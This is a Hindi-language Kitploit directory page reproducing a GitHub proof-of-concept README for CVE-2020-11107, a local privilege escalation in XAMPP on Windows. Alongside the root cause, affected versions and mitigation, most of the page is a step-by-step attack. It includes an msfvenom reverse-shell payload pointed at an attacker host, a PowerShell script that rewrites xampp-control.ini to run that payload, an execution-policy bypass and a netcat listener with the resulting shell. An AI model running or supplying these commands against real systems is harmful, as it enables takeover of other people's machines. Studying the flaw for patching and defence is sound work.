Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
उपकरण/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

🧨 CVE-2020-11107 – XAMPP स्थानीय विशेषाधिकार वृद्धि (Windows)

📌 अवलोकन

CVE-2020-11107 एक स्थानीय विशेषाधिकार वृद्धि (LPE) भेद्यता है जो Windows पर Apache Friends XAMPP को प्रभावित करती है।

एक अन-प्रिविलेज्ड (सीमित अधिकार वाला) उपयोगकर्ता XAMPP Control Panel कॉन्फ़िगरेशन फ़ाइल (xampp-control.ini) को संशोधित कर सकता है और डिफ़ॉल्ट एडिटर एक्ज़ीक्यूटेबल (notepad.exe) को एक दुर्भावनापूर्ण एक्ज़ीक्यूटेबल से बदल सकता है।
जब कोई अन्य उपयोगकर्ता (जैसे एडमिनिस्ट्रेटर) Control Panel से लॉग खोलता है, तो दुर्भावनापूर्ण बाइनरी पीड़ित के विशेषाधिकारों के साथ निष्पादित होती है, जिसके परिणामस्वरूप विशेषाधिकार वृद्धि होती है।

❗ यह भेद्यता Linux या macOS को प्रभावित नहीं करती।


🎯 प्रभावित संस्करण

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

परीक्षण किया गया

  • Windows 10
  • XAMPP 7.3.10

🧠 मूल कारण

  • xampp-control.ini वैश्विक रूप से लिखने योग्य है
  • एडिटर / ब्राउज़र पथ विश्वसनीय हैं और निष्पादित किए जाते हैं
  • कॉन्फ़िगरेशन परिवर्तन सभी उपयोगकर्ताओं को प्रभावित करते हैं
  • एक्ज़ीक्यूटेबल पथों पर कोई सत्यापन नहीं

🗂 महत्वपूर्ण फ़ाइलें

root@kitploit:~
C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 भेद्यता का प्रमाण

XAMPP संस्करण सत्यापित करें:

root@kitploit:~
type C:\xampp\properties.ini

उदाहरण आउटपुट:

root@kitploit:~
base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ संस्करण भेद्य है।


⚔️ शोषण चरण (PoC)

1️⃣ दुर्भावनापूर्ण पेलोड उत्पन्न करें (हमलावर – Kali)

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ पेलोड को लक्ष्य पर स्थानांतरित करें

root@kitploit:~
mkdir C:\temp
# Upload msf.exe into C:\temp

3️⃣ XAMPP कॉन्फ़िगरेशन संशोधित करें (सीमित अधिकार वाला उपयोगकर्ता)

शोषण स्क्रिप्ट (PowerShell):

root@kitploit:~
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

स्क्रिप्ट चलाएँ:

root@kitploit:~
powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ ट्रिगर निष्पादन (पीड़ित / एडमिन)

पीड़ित चलाता है:

root@kitploit:~
C:\xampp\xampp-control.exe

फिर Control Panel से कोई भी लॉग फ़ाइल खोलता है।


5️⃣ शेल पकड़ें (हमलावर)

root@kitploit:~
nc -lvnp 4444

✅ परिणाम:

root@kitploit:~
Connection received...
C:\WINDOWS\system32>

🎉 विशेषाधिकार वृद्धि सफल


📈 प्रभाव

  • स्थानीय विशेषाधिकार वृद्धि
  • मनमाना कमांड निष्पादन
  • पूर्ण सिस्टम समझौता (यदि एडमिन इसे ट्रिगर करता है)

🛡 शमन

  • XAMPP को निम्नलिखित संस्करणों (या नए) में अपडेट करें:

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • अनुमतियों को प्रतिबंधित करें:

root@kitploit:~
C:\xampp\xampp-control.ini
  • XAMPP Control Panel को एडमिनिस्ट्रेटर के रूप में चलाने से बचें

📚 संदर्भ

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Apache Friends Advisory: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • Original Research: https://github.com/S1lkys/CVE-2020-11107
टूल डाउनलोड करें